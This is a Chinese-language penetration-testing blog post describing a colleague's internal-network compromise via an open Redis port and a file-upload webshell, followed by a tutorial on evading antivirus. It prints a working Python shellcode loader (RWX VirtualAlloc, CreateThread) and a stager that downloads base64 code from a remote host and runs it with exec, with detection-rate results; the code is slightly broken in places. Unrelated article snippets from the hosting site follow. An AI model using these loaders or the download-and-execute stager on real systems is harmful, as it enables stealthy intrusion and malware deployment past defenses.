从开放端口到内网笔记

时间：2023-09-12 11:34:28浏览次数：35

标签：kernel32 内网 base64 端口笔记 ctypes windll shellcode payload

起因:同事A扫公司内网,发现某同事,6379端口开放---redis

从开放端口到内网笔记_加载

看了看80端口也开放,还在玩pikachu

从开放端口到内网笔记_加载_02

经过同意开始我的测试，找到pikachu中的文件上传靶场---上传前端js校验禁掉直接上shell连接

从开放端口到内网笔记_上传_03

随便翻了翻几个盘发现这个C++目录有个1.exe2023年3月16日上传的,看来被已经被搞了好久了,还没发现

从开放端口到内网笔记_加载_04

还是做了简单免杀了还是4/70

从开放端口到内网笔记_上传_05

python制作简单免杀

1.生成payload

从开放端口到内网笔记_加载_06

2.加载payload


import ctypes
#生成的payload
shellcode=b'payload'  
#加载shellcode
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

3.base64加密第二步骤中的代码

从开放端口到内网笔记_redis_07

4.把base64加密后的代码上传到某个站点

利用get请求去访问站点中的那个文件读取文件通过exec加载文件

从开放端口到内网笔记_加载_08

import requests,base64
#请求站点
s=requests.get("https://xx.com/payload.txt").text
#base64解密
sc=base64.b64decode(ok)
exec执行
exec(sc)

5.之前virustotal试过是6/70, Defender,360,火绒静态全过

缺点:pyinstaller, py2exe两个打包器经过测试,随便写点东西打包,在virustotal中都报毒,还有就是打包后的文件体积较大

内网渗透

接下来就是各种信息收集提权,写面杀的原因就是他安装了Defender

从开放端口到内网笔记_redis_09

搞的起劲过弄完面杀还没打包发现shell被删了,但是redis还可连接。通过redis-cli.exe写shell,连接成功

从开放端口到内网笔记_内网_10

接下来就是上免杀马,后续操作....

标签：kernel32,内网,base64,端口,笔记,ctypes,windll,shellcode,payload
From： https://blog.51cto.com/u_14881360/7443844

RK3568开发笔记（八）：开发板烧写buildroot固件（支持hdmi屏），搭建Qt交叉编译开发环境，编译一个D
前言前面发现开发板用ubuntu固件发现空间不够，本篇使用buildroot固件，来实现目标板运行qt界面应用。<br>烧写buildroot固件这部分更详细的参照《RK3568开发笔记（六）：开发板烧写ubuntu固件（支持mipi屏）》的步骤，本质上烧写都是一样的，只是不同的update.img。步骤一：下载镜像 ......
RK3568开发笔记（八）：开发板烧写buildroot固件（支持hdmi屏），搭建Qt交叉编译开发环境，编译一个D
前言前面发现开发板用ubuntu固件发现空间不够，本篇使用buildroot固件，来实现目标板运行qt界面应用。烧写buildroot固件这部分更详细的参照《RK3568开发笔记（六）：开发板烧写ubuntu固件（支持mipi屏）》的步骤，本质上烧写都是一样的，只是不同的update.img。步骤一：下载......
linux(centos7)安装防火墙firewalld及开放端口相关命令
安装firewalld防火墙命令：yuminstallfirewalld 安装完成，查看防火墙状态为notrunning，即未运行，输入命令开启：添加开放端口：防火墙相关命令：查看防火墙状态systemctlstatusfirewalld.service 打开防火墙systemctlstartfirewalld.service 关闭......
win2003系统system占用80端口的解决办法
本人一直都是用APMServ在winxp中搭建本地服务器测试网站，但最近换了win2003系统，结果本来在XP正常使用的APMServ启动时死活都提示80端口被占用，换成8080端口，虽然提示服务启动了，但是本地网站却打不开，在cmd中用命令查找时，发现提示system占用了80端口。如何查看端口在win03的cmd命令窗口......
win7系统如何在防火墙里开放端口
依次点击“开始”—“控制面板”—“windows防火墙”步骤阅读2先点击“打开或关闭windows防火墙”将windows防火墙打开步骤阅读步骤阅读3点击“高级设置”步骤阅读4设置入站规则（入站规则：别人电脑访问自己电脑；出站规则：自......
80端口被system 占用解决方法
今天启动Apache的时候老是提示失败，很简单，使用netstat-ano发现80端口被占用。如图所示：按照PID来说：在任务管理器中查看PID的进程名既然是system。那么应该不回是真正的系统。而是微软的其他系列产品的进程在运行。【注意：我已经在服务services.msc中结束了IISADmin服务......
新人笔记-权限修饰符与导包
packagecom_black.daobao.A1;publicclassTeacher{publicvoidteach(){System.out.println("goodstudy,daydayup");}}packagecom_black.daobao.A2;importcom_black.daobao.A1.Teacher;publicclassDemo{publicstati......
云服务器与内网穿透有什么区别？哪个好用？
云服务器与内网穿透有什么区别，哪个好用？如何在自己公网IP云主机上部署搭建P2P穿透？这里给大家汇总介绍一下，供大家共同学习了解。云服务器的一些特点：需要数据上云场景时，通常可以选择使用云服务器。1.数据上云。比如网站服务的，网站程序文件和数据库等都是部署在云端，本地不存在数据，或定......
如何实现自己在家搭建全端口P2P穿透？快解析内网穿透
对于有公网主机，有一定的操作能力，需要独立资源配置使用的，可以选择自行搭建内网映射服务。那么如何实现自己搭建全端口P2P穿透呢？下面为大家提供了不同场景下的不同方法，供大家使用时参考。SSH是一种安全的远程登录协议，可以通过SSH实现内网穿透。以下是关于如何使用SSH实现内网穿透的详......
CS224W学习笔记
目录CS224W学习笔记colab1colab2CS224W学习笔记colab1torch.ones全1torch.zeros全0torch.rand0-1随机x.shapeshapex.dtype数据类型zeros=torch.zeros(3,4,dtype=torch.float32)使用数据类型zeros=zeros.type(torch.long)改变数据类型使用torch进行梯度下降：......

从开放端口到内网笔记

相关文章

赞助商

阅读排行